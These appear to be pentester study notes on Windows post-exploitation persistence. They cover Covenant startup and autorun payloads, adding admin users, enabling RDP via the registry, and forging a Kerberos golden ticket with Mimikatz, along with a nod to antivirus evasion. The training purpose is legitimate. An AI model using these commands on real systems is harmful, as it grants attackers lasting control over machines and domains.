Persistence

Here we assume we have a shell with administrative privileges on the target

Create a new user

Covenant

• Select Interact in your grunt

• Use shellcmd net users username password /add (Note: for a real context engagement we need to make a safe password and a recognizable username such as the name of the company we work for)

• we can check that the user has been successfully added using shell net users

• Now we need to add our user to the administrators group using shell net localgroup administrators username /add

Startup Persistence

Covenant

• This method will ibject a payload in the startup tasks

• In your grunt go to the tab Task in the GruntTask list choose PersistStartup

• You should see this in the Payload input: powershell -Sta -Nop -Window Hidden -EncodedCommand <blah> replace the blah with a powershell encoded launcher and click on Task

• If we restart the target machine and login again there we should get our shell back

Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion

Autorun Persistence

Covenant

• Go to launcher, select Binary Launcher Generate one and Download it

• Go back to your high integrity grunt, go to the task tab

• In the GruntTack Select PersistAutorun, choose a directory in where to upload the binary

• Go to the interact tab type Upload put the Directory in the file path and select the bin file you download previously

• You can check if the bin was successfuly added to the Registry using this cmd: GetRegistryKey HCKU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

• Once you restart you should have a shell back

Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion

Persistence with RDP

• With an initial shell on a machine with covenant

• Enable Remote Desktop in our target: in the interact tab we can type this powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

• We could then connect to the target using rdp and disabling anti-virus this way

• Disable Remote Desktop Commection: powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"

Golden Ticket Persistence

• Here we will powershell along with powerview.ps1 and invoke-mimikatz.ps1

• . .\powerview.ps1

• Get-DomainSID this will give us the domain SID, we will need to copy it

• . .\invoke-mimikatz.ps1

• Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:domain.local /sid:PUT-THE-SID-HERE /krbtgt:PUT-HERE-TICKET-OF-DC-KRBTGT /ptt"'

• We should be a domain administrator and have control of the domain controller and we can promote a compromised user to domain admins

Resources

Movement, Pivoting and Persistence for Pentesters and Ethical Hackers

TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker